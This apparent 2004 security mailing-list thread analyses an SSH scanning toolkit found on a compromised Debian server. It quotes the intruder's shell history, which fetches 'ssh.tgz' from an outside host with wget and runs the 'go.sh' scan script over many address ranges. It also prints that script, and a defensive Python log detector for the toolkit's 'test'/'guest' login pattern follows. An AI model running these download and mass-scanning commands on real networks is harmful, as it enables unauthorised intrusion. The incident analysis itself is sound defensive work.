This all looks very similar to the couple-year-old ssh1 hack. I recall some of these same files and binaries, I think, from that old hack, but this looks like someone took an old hack and tried to rework it as a brute forcer for poorly set-up systems.
Thanks,

Ron DuFresne

On Thu, 29 Jul 2004, Andrei Galca-Vasiliu wrote:

> By the way, you have to be root to use "ss":
>
> [EMAIL PROTECTED]:~/ssh$ ./go.sh 82.77.45
> scanning network 82.77.*.*
> usec: 30000, burst packets 50
> using inteface eth0
> ERROR: UID != 0
>
>
> In a mail dated Thursday 29 July 2004 19:38, Stefan Janecek wrote:
> > Hmmm - I have also been getting those login attempts, but thought them to
> > be harmless. Maybe they are not *that* harmless, though... Today I
> > managed to get my hands on a machine that was originating such login
> > attempts. I must admit I am far from being a linux security expert, but
> > this is what I've found out up to now:
> >
> > Whoever broke into the machine did not make any attempt to cover up his
> > tracks - this is what I found in /root/.bash_history:
> >
> > ------
> > id
> > uname -a
> > w
> > id
> > ls
> > wgte frauder.us/linux/ssh.tgz
> > wget frauder.us/linux/ssh.tgz
> > tar xzvf ssh.tgz
> > tar xvf ssh.tgz
> > ls
> > cd ssh
> > ls
> > ./go.sh 195.178
> > ls
> > pico uniq.txt
> > vi uniq.txt
> > ls
> > rm -rf uniq.txt
> > ./go.sh 167.205
> > ls
> > rm -rf uniq.txt vuln.txt
> > ./go.sh 202.148.20
> > ./go.sh 212.92
> > ./go.sh 195.197
> > ./go.sh 147.32
> > ./go.sh 213.168
> > ./go.sh 134.176
> > ./go.sh 195.83
> > ------
> >
> > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> > binaries:
> >
> > go.sh:
> > -------
> > ./ss 22 -b $1 -i eth0 -s 6
> > cat bios.txt |sort | uniq > uniq.txt
> > ./sshf
> > -------
> >
> > * 'ss' apparently is some sort of portscanner
> > * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> >   'test' first, then as user 'guest' (according to tcpdump).
> >
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
> >
> > The compromised machine was running an old debian woody installation
> > which had not been upgraded for at least one year; the sshd version
> > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
> >
> > As already mentioned, I am far from being an expert, but if I can assist
> > in further testing, then let me know. Please CC me, I am not subscribed
> > to the list.
> >
> > cheers,
> > Stefan
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
>
> Andrei Galca-Vasiliu
> Folio Q Advertising
> www.fq.ro
>
> Security is an illusion...
>
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
-- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
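Added example, not part of the thread above: a small Python detector that picks out the login pattern Stefan describes from sshd logs, namely exactly one failed attempt as 'test' followed by exactly one as 'guest' from the same source, and keeps it apart from ordinary brute forcing, which would never show up at a one-attempt-per-user threshold. The auth.log lines, the host name 'woody', the IP addresses and the brute-force threshold are all constructed for the example; the 'illegal user' wording follows what OpenSSH 3.x of that era logged (later releases say 'invalid user', which the pattern also accepts).

```python
import re
from collections import defaultdict

# OpenSSH 3.x logs "illegal user" for unknown accounts; later versions log "invalid user".
# A failed attempt for an existing account carries no such prefix, so the group is optional.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:(?:illegal|invalid) user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# The login sequence the thread attributes to sshf: one try as 'test', then one as 'guest'.
PROBE_SEQUENCE = ("test", "guest")

# At or above this many failures from one source we call it plain brute force (assumed threshold).
BRUTE_FORCE_THRESHOLD = 5


def parse_failed_logins(lines):
    """Map each source IP to the usernames it failed to log in as, in log order."""
    attempts = defaultdict(list)
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            attempts[m.group("ip")].append(m.group("user"))
    return dict(attempts)


def classify_source(usernames):
    """Label one source by the shape of its failures, not only by their count."""
    if tuple(usernames) == PROBE_SEQUENCE:
        return "sshf-probe"
    if len(usernames) >= BRUTE_FORCE_THRESHOLD:
        return "brute-force"
    return "other"


def classify_log(lines):
    """Return {source_ip: label} for every source with at least one failed login."""
    return {ip: classify_source(users) for ip, users in parse_failed_logins(lines).items()}


# Constructed sample auth.log excerpt (not taken from the thread); IPs are documentation ranges.
SAMPLE_LOG = """\
Jul 29 19:12:01 woody sshd[1234]: Illegal user test from 192.0.2.10
Jul 29 19:12:01 woody sshd[1234]: Failed password for illegal user test from 192.0.2.10 port 40123 ssh2
Jul 29 19:12:03 woody sshd[1236]: Illegal user guest from 192.0.2.10
Jul 29 19:12:03 woody sshd[1236]: Failed password for illegal user guest from 192.0.2.10 port 40124 ssh2
Jul 29 19:15:40 woody sshd[1250]: Failed password for root from 198.51.100.7 port 51000 ssh2
Jul 29 19:15:41 woody sshd[1251]: Failed password for root from 198.51.100.7 port 51001 ssh2
Jul 29 19:15:42 woody sshd[1252]: Failed password for root from 198.51.100.7 port 51002 ssh2
Jul 29 19:15:43 woody sshd[1253]: Failed password for illegal user admin from 198.51.100.7 port 51003 ssh2
Jul 29 19:15:44 woody sshd[1254]: Failed password for illegal user oracle from 198.51.100.7 port 51004 ssh2
Jul 29 19:20:05 woody sshd[1270]: Failed password for stefan from 203.0.113.5 port 33001 ssh2
""".splitlines()


if __name__ == "__main__":
    # Prints one line per source: 192.0.2.10 is the sshf-style probe, 198.51.100.7 the brute forcer.
    for ip, label in sorted(classify_log(SAMPLE_LOG).items()):
        print(f"{ip:16} {label}")
```

The point of matching on the ordered username sequence rather than on a failure count is that a count-based threshold, which is what most log watchers of the time used, is exactly what two single attempts slip under; feeding real /var/log/auth.log lines to classify_log() in place of SAMPLE_LOG is enough to check whether a host has been visited by this scanner.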
